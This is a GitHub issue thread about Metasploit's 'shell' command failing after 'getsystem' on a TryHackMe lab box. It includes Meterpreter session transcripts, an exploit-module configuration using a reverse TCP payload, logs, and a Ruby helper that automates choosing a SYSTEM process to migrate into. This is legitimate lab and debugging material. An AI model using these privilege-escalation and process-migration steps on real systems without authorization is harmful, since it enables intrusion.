Open AlanFoster opened 3 years ago
I'm having the same issue with the exact same context on TryHackMe's AoC2.
Hmm, just retested this on a Windows Server 2016 x64 target and, as near as I can tell, this doesn't seem to be occurring for me.

```
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 172.26.192.240:4444
[*] Sending stage (200262 bytes) to 172.26.192.240
[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.26.192.240:4444) at 2021-02-22 16:10:10 -0600

meterpreter > shell
Process 1672 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
win-qka9jks5mvu\administrator

C:\Users\Administrator\Desktop>exit
exit
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 7956 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
win-qka9jks5mvu\administrator

C:\Users\Administrator\Desktop>exit
exit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.26.192.240   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) >
```
When I tried it on the target using a command stager exploit, which I think is where the difference comes in, I notice I don't get the same warning about trying to run `shell` as the SYSTEM user and the automatic downgrading taking place. Furthermore, when I try to use `rev2self` to drop back down to a normal user, I'm able to run the `shell` command again, despite previously not being able to run it.
```
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: TBFC-WEB-01\elfmcskidy
meterpreter > sysinfo
Computer        : TBFC-WEB-01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2732 created.
Channel 1 created.
meterpreter > sysinfo
Computer        : TBFC-WEB-01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > rev2self
meterpreter > shell
Process 1096 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin>
```
I faced a similar issue: seemingly running the `getsystem` command successfully, but not getting a shell after that. After a few tests it seems that the reason for this behavior is that Windows uses the Primary Token (and not the impersonated token obtained with the `getsystem` command) of a process to determine the actions that the process can perform. Most likely our current process's Primary Token does not allow us to pop a shell as SYSTEM.

To get around this problem, we can migrate to a process with higher permissions (such as services.exe) after using `getsystem`, but before requesting a shell.

Finally, I feel like this migration part could probably be automated and added to the `getsystem` command.

Let me know if that fixes your issue :)
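An added example, not code from this thread or from Metasploit itself, that turns the workaround above into a repeatable step: parse the table that Meterpreter's `ps` command prints, pick a SYSTEM-owned process that is reasonably safe to migrate into, and emit the `getsystem` / `migrate` / `shell` sequence with the target PID filled in. The process list below is constructed for illustration (it is not captured from the target in this thread), and the preferred/avoided process names are this example's own heuristics, not Metasploit defaults.

```ruby
# Constructed sample of Meterpreter `ps` output (illustrative, not from the target above).
SAMPLE_PS = <<~'PS'
  Process List
  ============

   PID   PPID  Name              Arch  Session  User                          Path
   ---   ----  ----              ----  -------  ----                          ----
   0     0     [System Process]
   4     0     System            x64   0
   316   4     smss.exe          x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
   412   404   csrss.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
   576   488   services.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
   584   488   lsass.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
   1120  576   spoolsv.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
   1436  576   svchost.exe       x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
   2732  3044  cmd.exe           x86   0        TBFC-WEB-01\elfmcskidy        C:\Windows\SysWOW64\cmd.exe
PS

SYSTEM_USER = 'NT AUTHORITY\SYSTEM'
# Heuristic (this example's own): long-lived SYSTEM services that tolerate injection, most preferred first.
PREFERRED = %w[spoolsv.exe services.exe winlogon.exe svchost.exe]
# Heuristic (this example's own): critical or protected processes; a failed injection here can take the host down.
AVOID = %w[smss.exe csrss.exe lsass.exe wininit.exe]

# Parse the column-aligned `ps` table into hashes. Columns are separated by two or
# more spaces; rows with no User column (PID 0/4, or processes we could not open)
# are dropped because they cannot be migration targets anyway.
def parse_ps(text)
  rows = text.lines.map(&:strip)
  start = rows.index { |l| l.start_with?('---') }
  return [] unless start
  rows[(start + 1)..].filter_map do |line|
    f = line.split(/\s{2,}/)
    next if f.size < 6
    rec = { pid: f[0].to_i, ppid: f[1].to_i, name: f[2], arch: f[3], session: f[4].to_i, user: f[5], path: f[6] }
    rec
  end
end

# Rank SYSTEM-owned, non-critical processes. A process whose arch matches the
# session wins first (cross-arch migration works on Windows Meterpreter, but
# same-arch is the conservative choice), then the PREFERRED order, then lowest PID.
# Returns nil when nothing suitable is running.
def choose_migration_target(procs, session_arch:)
  candidates = procs.select { |p| p[:user] == SYSTEM_USER && !AVOID.include?(p[:name].downcase) }
  candidates.min_by do |p|
    pref = PREFERRED.index(p[:name].downcase) || PREFERRED.size
    [p[:arch] == session_arch ? 0 : 1, pref, p[:pid]]
  end
end

# The Meterpreter command sequence the thread converged on: impersonate SYSTEM,
# move into a process whose *primary* token is SYSTEM, verify, then spawn the shell.
def migration_commands(ps_text, session_arch:)
  target = choose_migration_target(parse_ps(ps_text), session_arch: session_arch)
  raise 'no suitable SYSTEM process found' unless target
  ['getsystem', "migrate #{target[:pid]}", 'getuid', 'shell']
end

if __FILE__ == $PROGRAM_NAME
  # The session in this thread reports "Meterpreter : x86/windows" on an x64 host.
  puts migration_commands(SAMPLE_PS, session_arch: 'x86')
end
```

In practice: run `getsystem`, then `ps` in the session, paste that output into `migration_commands`, and after `migrate` confirm with `getuid` that the Server username is `NT AUTHORITY\SYSTEM` before calling `shell`. With the sample above the x86 session has no x86 SYSTEM process to choose from, so the arch preference is a tiebreaker and spoolsv.exe (x64) is selected, which matches what worked for the reporter further down the thread.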
@JackPepper Thanks for the workaround, that worked for me. After running `getsystem` and migrating to spoolsv.exe, it's now possible to open a shell :+1:

Also confirmed that `rev2self` works, but since you're no longer SYSTEM with that approach, it's not as practical.
> I faced a similar issue: seemingly running the `getsystem` command successfully, but not getting a shell after that. After a few tests it seems that the reason for this behavior is that Windows uses the Primary Token (and not the impersonated token obtained with the `getsystem` command) of a process to determine the actions that the process can perform. Most likely our current process's Primary Token does not allow us to pop a shell as SYSTEM.
>
> To get around this problem, we can migrate to a process with higher permissions (such as services.exe) after using `getsystem`, but before requesting a shell.
>
> Finally, I feel like this migration part could probably be automated and added to the `getsystem` command.
>
> Let me know if that fixes your issue :)
Thanks @T0m-Ph, this really helped me while doing one of the CTFs. It's a great tip, and I'm glad to see someone who has been in the same situation solved this for the people who will be here in the future. :)
Steps to reproduce
Target: https://tryhackme.com/room/adventofcyber2 Day 12 Task 17 - Networking Ready, set, elf.
Getting a meterpreter shell works fine; running the `shell` command also works fine. However, after running `getsystem` the `shell` command no longer works as expected.
Expected behavior
`shell` works after running `getsystem`.
Current behavior
`shell` no longer works. Logs show:
Metasploit version
Additional Information
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
```
[framework/core]
loglevel=3
sessionlogging=true
[framework/features]
wrapped_tables=true
RHOST_HTTP_URL=false
[framework/ui/console]
ActiveModule=exploit/windows/http/tomcat_cgi_cmdlineargs
[windows/http/tomcat_cgi_cmdlineargs]
RPORT=8080
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
ListenerComm=
SSL=false
SSLCert=
SSLCompression=false
SSLCipher=
TCP::max_send_size=0
TCP::send_delay=0
RHOSTS=10.10.227.63
VHOST=
Proxies=
UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HttpUsername=
HttpPassword=
HttpRawHeaders=
DigestAuthIIS=true
SSLVersion=Auto
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpTrace=false
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
HTTP::no_cache=false
HTTP::chunked=false
HTTP::junk_headers=false
HTTP::compression=none
HTTP::server_name=Apache
URIHOST=
URIPORT=
SendRobots=false
CMDSTAGER::FLAVOR=auto
CMDSTAGER::DECODER=
CMDSTAGER::TEMP=
CMDSTAGER::SSL=false
TARGETURI=/cgi-bin/elfwhacker.bat
AutoCheck=true
ForceExploit=false
PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=tun0
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependMigrate=false
PrependMigrateProc=
EXITFUNC=process
PayloadBindPort=
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
TARETURI=/cgi-bin/elfwhacker.bat
```
History
The following commands were ran during the session and before this issue occurred:
```
2885 use windows/http/tomcat_cgi_cmdlineargs
2886 options
2887 set LHOST tun0
2888 set TARETURI /cgi-bin/elfwhacker.bat
2889 set RHOSTS 10.10.227.63
2890 options
2891 run
2892 set TARGETURI /cgi-bin/elfwhacker.bat
2893 check
2894 run
2895 dir
2896 shell
2897 getsystem
2898 shell
2899 setg loglevel 3
2900 sessions -i -1
2901 shell
2902 debug
```
Framework Errors
The following framework errors occurred before the issue occurred:
```
[12/13/2020 19:41:32] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/13/2020 19:41:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/13/2020 19:41:32] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/13/2020 19:41:32] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[12/13/2020 19:41:36] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:
Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in
```
Web Service Errors
The following web service errors occurred before the issue occurred:
```
msf-ws.log does not exist.
```
Framework Logs
The following framework logs were recorded before the issue occurred:
```
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: none to bind
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: tunnel to bind
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/bind_tcp_uuid is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_http is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_https is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: none to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: none to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_rc4 is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: none to reverse
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel
[12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel
[12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with windows/http/tomcat_cgi_cmdlineargs
[12/13/2020 19:46:32] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
[12/13/2020 19:46:38] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
[12/13/2020 19:46:41] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
[12/13/2020 19:47:13] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
[12/13/2020 19:47:55] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
```
Web Service Logs
The following web service logs were recorded before the issue occurred:
```
msf-ws.log does not exist.
```
Version/Install
The versions and install method of your Metasploit setup:
```
Framework: 6.0.18-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
```